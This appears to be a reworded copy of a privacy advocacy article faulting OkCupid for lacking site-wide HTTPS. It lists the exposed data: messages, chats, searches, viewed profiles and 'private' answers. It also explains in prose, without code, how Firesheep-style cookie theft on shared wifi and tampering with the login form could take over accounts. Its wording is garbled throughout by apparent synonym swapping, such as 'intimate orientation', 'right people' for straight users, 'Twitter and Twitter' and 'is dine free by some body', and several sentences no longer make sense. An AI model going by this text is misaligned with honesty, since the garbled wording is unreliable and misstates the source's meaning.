The love fest may be coming to an end for the hundreds of thousands of users searching for that special someone through one of the largest free online dating sites. OkCupid is putting users’ privacy at risk by failing continually to support safe use of its whole site through HTTPS. Every OkCupid email, talk session, search, clicked link, web page viewed, and username is sent on the internet in unencrypted plaintext, where it could be intercepted and read by anybody regarding the system.
Screen shot from OkCupid Help Forum. While passwords after inital signup aren’t sent within the clear, there are some other serious protection dilemmas with OkCupid.com.
“HTTPS” is standard web encryption that ensures information sent and gotten on the internet is encrypted in place of as plaintext. OkCupid will not enable HTTPS across the website, which means while OkCupid does not leak passwords entered log that is during over plaintext, it will leak lots of other delicate information. OkCupid’s failure to potentially offer HTTPS support reveals:
- E-mail content from within OkCupid
- Content of online chats on OkCupid
- Queries conducted on the internet site
- Every unique page viewed, and so all profiles looked over
- Content of “hidden” questions–questions a person responds to so that you can enhance match results then again marks as “private” so others cannot see his / her reaction
Failing continually to provide HTTPS is very unfortunate because OkCupid offers many different privacy-enhancing methods of restricting who is able to access your profile. For instance, users whom mark their intimate orientation as homosexual or bisexual may choose to not enable their profile to be noticed by right people. This particular feature could be ideal for an individual who is wanting up to now a same-sex partner it is maybe not openly queer and others inside their community. Regrettably, your profile data, like the undeniable fact that you identify as gay and wish that is don’t be observed by right individuals, is transmitted over plaintext.
OkCupid provides privacy settings to restrict who views your profile, including limiting whether heterosexual users is able to see your profile.
Other privacy-enhancing features such as for example restricting who is able to see your profile ( to any or all, people in OkCupid, your favorites, or no body after all) are circumvented easily is dine free by some body monitoring your plaintext interaction with OkCupid.
It is even even worse than you imagined.
The failure to encrypt your communications exposes painful and sensitive data in online profiles to eavesdroppers, whom could snoop from the content of one’s profile to know about delicate topics like spiritual and political values, medication use, and intimate practices. The failure to encrypt additionally reveals the HTTP cookie that’s used to authenticate you to definitely the website, which means the eavesdropper can in fact simply simply take over your bank account and impersonate you, also with no knowledge of your password.
OkCupid lets users respond to questions to assist them boost their matches. Users receive privacy settings to respond to concerns “privately”—though the info continues to be sent in plaintext.
Although protection specialists have actually warned about that issue for more than 10 years, this attack ended up being often dismissed as theoretical or tough to display. But all that changed with all the launch of Firesheep, a simple device that can be utilized on provided wifi sites to take control web-based records on non-HTTPS web sites. This sort of eavesdropping is trivial for some body with also skills that are basic.
Firesheep allows an assailant take control an account by stealing a cookie without really understanding the account password. As an example, once you sit down in a restaurant employing a provided system and log into a website that will not have HTTPS enabled, someone utilizing the networking that is same be wary of what you do and also impersonate you.
Because OkCupid’s login form can be delivered over insecure HTTP, an even more sophisticated attacker may also tamper with all the login type itself, changing it having a version that disables HTTPS completely in order to find out the user’s password.
Major web sites like Twitter and Twitter have come to appreciate these threats and offered meaningful, comprehensive HTTPS support to guard their users. These actions have been in positioning with previous Federal Trade Commissioner Pamela Jones Harbour’s call for websites to consider HTTPS. Unfortuitously, internet dating sites like OKCupid are lagging behind—way behind.
Tell OkCupid to protect your privacy
Numerous avid fans of OkCupid would you like to let the service understand it comes to security that they shouldn’t cut corners when. Forward OkCupid an email here.